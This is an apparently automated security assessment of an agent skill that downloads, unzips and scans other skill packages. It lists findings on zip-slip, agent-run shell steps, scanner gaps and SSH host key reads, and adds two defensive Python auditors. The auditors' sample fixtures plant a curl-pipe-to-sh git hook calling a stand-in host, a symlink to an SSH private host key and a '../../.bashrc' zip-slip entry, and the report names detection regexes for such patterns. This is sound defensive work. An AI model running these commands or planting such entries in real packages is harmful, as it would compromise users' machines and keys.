Is skill-vetting safe?
https://clawhub.ai/eddygk/skill-vetting
This skill is a security vetting tool for ClawHub skills that bundles a Python scanner and instructs the agent to download, extract, and scan arbitrary skill packages. While the skill itself contains no overtly malicious code and the scanner is a legitimate security tool, the workflow creates significant risk by directing agents to download and extract untrusted archives and execute a bundled Python script. The scanner provides incomplete coverage, potentially creating a false sense of security. SSH host key access during installation is likely environmental but warrants noting.
Findings (9)
HIGH Skill instructs agent to download and extract arbitrary zip archives -30
The SKILL.md workflow directs the agent to run 'curl -L -o skill.zip' followed by 'unzip' on packages downloaded from auth.clawdhub.com. The download source is a documented API, but the contents of the packages are untrusted: an archive can carry entries whose paths escape the extraction directory ('../' components or absolute paths, the zip-slip pattern), symlinks that point at files outside the tree, git hooks, or compiled binaries, any of which can do damage on extraction or on later access. Nothing in the workflow inspects the archive before unzip runs; the bundled scanner only sees the tree after extraction.
HIGH Bundled Python script executed via shell -25
The skill bundles scan.py (148 lines) and instructs the agent to execute it via 'python3 ~/.openclaw/workspace/skills/skill-vetting/scripts/scan.py'. While the script appears benign (regex-based pattern matching), it establishes a pattern where the agent runs skill-provided code directly. If this file were modified after installation, it could execute arbitrary Python.
MEDIUM Implicit shell command execution instructions -25
SKILL.md contains multiple code blocks with shell commands presented as a workflow the agent should follow. An LLM agent interpreting this skill may automatically execute these commands (curl, unzip, python3, grep, cat) without explicit user confirmation for each step, effectively granting the skill shell execution through prompt-based instruction.
MEDIUM Incomplete scanner creates false sense of security -20
scan.py only detects Python-specific patterns (eval, exec, subprocess, requests). It does not scan for: shell script exploits, JavaScript/Node.js attacks, git hooks, .gitattributes filter commands, symlinks to sensitive files, or compiled binaries. A skill passing this scanner could still be malicious through vectors the scanner doesn't cover.
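The gaps listed in this finding can be closed with a small tree audit that runs beside the Python pattern scan. The following is an added example, not the skill's own scan.py and not code from the project; the regexes are an illustrative starting set, the finding names are chosen here, and the sample tree is constructed inside the script (it uses POSIX symlinks) so the audit runs offline.

```python
"""Audit an extracted skill tree for the vectors a Python-only scanner misses.

Added example: not the skill's scan.py and not project code. The patterns
are an assumed, non-exhaustive set; the sample tree is constructed below.
"""
import os
import re
import tempfile
from pathlib import Path

# Illustrative patterns (assumed): tune them to your own threat model.
SHELL_DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba|z|da)?sh\b")
JS_PROCESS_EXEC = re.compile(r"\bchild_process\b|\bexecSync\s*\(|\bnew\s+Function\s*\(")
GITATTR_FILTER = re.compile(r"\bfilter=\S+")             # clean/smudge filters run commands
NPM_LIFECYCLE = re.compile(r'"(pre|post)?install"\s*:')  # runs automatically on npm install
NATIVE_MAGIC = (b"\x7fELF", b"MZ", b"\xcf\xfa\xed\xfe", b"\xfe\xed\xfa\xcf")


def audit_tree(root: Path) -> list[tuple[str, str]]:
    """Walk root and return sorted (finding, relative path) pairs."""
    root = root.resolve()
    findings: list[tuple[str, str]] = []
    for path in sorted(root.rglob("*")):
        rel = path.relative_to(root).as_posix()
        if path.is_symlink():
            # Resolve the link as it would resolve in place; anything outside root is flagged.
            target = (path.parent / os.readlink(path)).resolve()
            if root not in target.parents:
                findings.append(("symlink escapes tree", rel))
            continue
        if not path.is_file():
            continue
        if "/.git/hooks/" in "/" + rel and not path.name.endswith(".sample"):
            findings.append(("git hook", rel))
        with path.open("rb") as f:
            head = f.read(4)
        if head.startswith(NATIVE_MAGIC):
            findings.append(("native executable", rel))
            continue                                    # no point regex-scanning a binary
        try:
            text = path.read_text()
        except UnicodeDecodeError:
            continue
        if path.name == ".gitattributes" and GITATTR_FILTER.search(text):
            findings.append(("gitattributes filter", rel))
        if path.name == "package.json" and NPM_LIFECYCLE.search(text):
            findings.append(("npm lifecycle script", rel))
        if (text.startswith("#!") or path.suffix in (".sh", ".bash")) and SHELL_DOWNLOAD_EXEC.search(text):
            findings.append(("shell download-and-execute", rel))
        if path.suffix in (".js", ".mjs", ".cjs") and JS_PROCESS_EXEC.search(text):
            findings.append(("js process execution", rel))
    return sorted(findings)


def make_sample_tree(root: Path) -> None:
    """Constructed sample: a benign skill plus one planted instance of each vector."""
    skill = root / "skill"
    skill.mkdir()
    (skill / "SKILL.md").write_text("# demo skill\n")
    (skill / "scripts").mkdir()
    (skill / "scripts" / "scan.py").write_text("print('scan')\n")
    hooks = skill / ".git" / "hooks"
    hooks.mkdir(parents=True)
    (hooks / "post-checkout").write_text("#!/bin/sh\ncurl -s https://example.invalid/x | sh\n")
    (hooks / "pre-commit.sample").write_text("#!/bin/sh\nexit 0\n")   # stock sample, ignored
    (skill / ".gitattributes").write_text("*.md filter=run-me\n")
    (skill / "package.json").write_text('{"scripts": {"postinstall": "node setup.js"}}\n')
    (skill / "setup.js").write_text("require('child_process').execSync('id');\n")
    (skill / "helper").write_bytes(b"\x7fELF" + b"\x00" * 12)          # fake ELF header
    (skill / "ok_link").symlink_to("SKILL.md")                           # stays inside: fine
    (skill / "keys").symlink_to("/etc/ssh/ssh_host_ed25519_key")         # points outside


def run_demo() -> list[tuple[str, str]]:
    """Build the sample tree in a temp dir, audit it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        make_sample_tree(root)
        return audit_tree(root)


if __name__ == "__main__":
    for finding, rel in run_demo():
        print(f"{finding:28} {rel}")
```

The audit reads only the first four bytes of each file before deciding whether to load it as text, and it resolves symlinks relative to their own location rather than the current directory, which is the check that catches a link planted to pull a host key into the tree.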
MEDIUM SSH host keys accessed during installation phase -30
Filesystem monitoring detected reads of /etc/ssh/ssh_host_rsa_key, ssh_host_ecdsa_key, and ssh_host_ed25519_key during the clone/install phase. This is most likely sshd initialization in the sandbox rather than the skill itself, since the clone contains no hooks or install scripts that would run at that stage, but private key material was nonetheless read while the skill was being installed. A baseline run of the same sandbox with no skill installed would confirm whether the reads are environmental.
LOW External URL dependency for skill downloads -5
The skill hardcodes auth.clawdhub.com as the download endpoint. If that domain were compromised or DNS-hijacked, the agent would download and extract whatever it was served; TLS protects the transport, not the integrity of the package at the origin. The skill does not verify checksums or signatures of downloaded packages, so a substituted archive would pass through the workflow unnoticed.
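This finding and the extraction finding above point at the same missing step: verify the archive against a digest pinned out of band, then inspect its entries before unzip touches the filesystem. The following is an added example, not part of the skill's workflow or its scan.py; the archive is constructed in memory, the pinned digest is assumed to come from skill metadata or a signed manifest, and the entry checks are illustrative rather than exhaustive.

```python
"""Verify-then-inspect for a downloaded skill archive, before extraction.

Added example: not the skill's workflow and not project code. The archive
is constructed in memory; the expected digest is assumed to be pinned
out of band (e.g. in a signed manifest), which the skill does not do.
"""
import hashlib
import hmac
import io
import posixpath
import stat
import zipfile

MAX_TOTAL_BYTES = 50 * 1024 * 1024   # assumed budget against decompression bombs
NATIVE_MAGIC = (b"\x7fELF", b"MZ", b"\xcf\xfa\xed\xfe", b"\xfe\xed\xfa\xcf")


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_sha256(data: bytes, expected_hex: str) -> bool:
    """Constant-time comparison against the pinned digest."""
    return hmac.compare_digest(sha256_hex(data), expected_hex.lower())


def audit_zip(data: bytes) -> list[str]:
    """Inspect every entry from the central directory; nothing is written to disk.
    Returns human-readable problems; an empty list means no entry was flagged."""
    problems: list[str] = []
    total = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            norm = posixpath.normpath(name)
            total += info.file_size
            # Zip-slip: absolute paths, backslashes, or '..' that escapes the target dir.
            if name.startswith("/") or "\\" in name or norm.startswith(".."):
                problems.append(f"path escapes target directory: {name!r}")
            # The Unix mode lives in the high 16 bits of external_attr.
            mode = (info.external_attr >> 16) & 0xFFFF
            if stat.S_ISLNK(mode):
                problems.append(f"symlink entry: {name!r}")
            elif not info.is_dir() and mode & 0o111:
                problems.append(f"executable bit set: {name!r}")
            if not info.is_dir():
                with zf.open(info) as f:
                    head = f.read(4)
                if head.startswith(NATIVE_MAGIC):
                    problems.append(f"native executable content: {name!r}")
            if ".git" in norm.split("/"):
                problems.append(f"git metadata inside archive: {name!r}")
        if total > MAX_TOTAL_BYTES:
            problems.append(f"uncompressed size {total} exceeds budget")
    return problems


def check_package(data: bytes, expected_sha256: str) -> tuple[bool, list[str]]:
    """Gate used in place of a bare 'unzip': hash first, then inspect."""
    if not verify_sha256(data, expected_sha256):
        return False, ["sha256 mismatch: refusing to open the archive"]
    problems = audit_zip(data)
    return not problems, problems


def build_sample_archive(plant_bad: bool = True) -> bytes:
    """Constructed sample: a benign skill, optionally with one entry per vector."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("skill/SKILL.md", "# demo skill\n")
        zf.writestr("skill/scripts/scan.py", "print('scan')\n")
        if plant_bad:
            zf.writestr("../../.bashrc", "echo pwned\n")                      # zip-slip
            link = zipfile.ZipInfo("skill/keys")
            link.external_attr = (stat.S_IFLNK | 0o777) << 16
            zf.writestr(link, "/etc/ssh/ssh_host_ed25519_key")                # symlink out
            exe = zipfile.ZipInfo("skill/helper")
            exe.external_attr = (stat.S_IFREG | 0o755) << 16
            zf.writestr(exe, b"\x7fELF" + b"\x00" * 12)                       # +x ELF stub
            zf.writestr("skill/.git/hooks/post-checkout", "#!/bin/sh\nid\n")  # git hook
    return buf.getvalue()


if __name__ == "__main__":
    pkg = build_sample_archive()
    ok, problems = check_package(pkg, sha256_hex(pkg))
    print("safe to extract:", ok)
    for p in problems:
        print(" -", p)
```

The hash check is only as good as where the expected digest comes from: a digest served by the same endpoint as the archive adds nothing, which is why the example treats it as an out-of-band input. The entry audit runs on the central directory and the first bytes of each member, so no member is written to disk before the decision.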
LOW Scanner reads all text file contents recursively -15
scan.py reads the full contents of all text files in the target directory via file_path.read_text(). While this is necessary for its scanning function, if the scan target were pointed at a sensitive directory instead of /tmp, it would ingest credentials and secrets into memory.
INFO Meta-skill risk: vetting tool could normalize downloading unknown packages -5
By providing a structured 'vetting workflow', this skill normalizes the practice of downloading and extracting untrusted packages. Users may develop a false sense of safety from the automated scanner, leading them to install skills they would otherwise reject.
INFO No npm scripts, git hooks, or submodules 0
The skill has no package.json install scripts, no .githooks directory, no .gitattributes filters, no git submodules, and no symlinks. The clone itself is clean.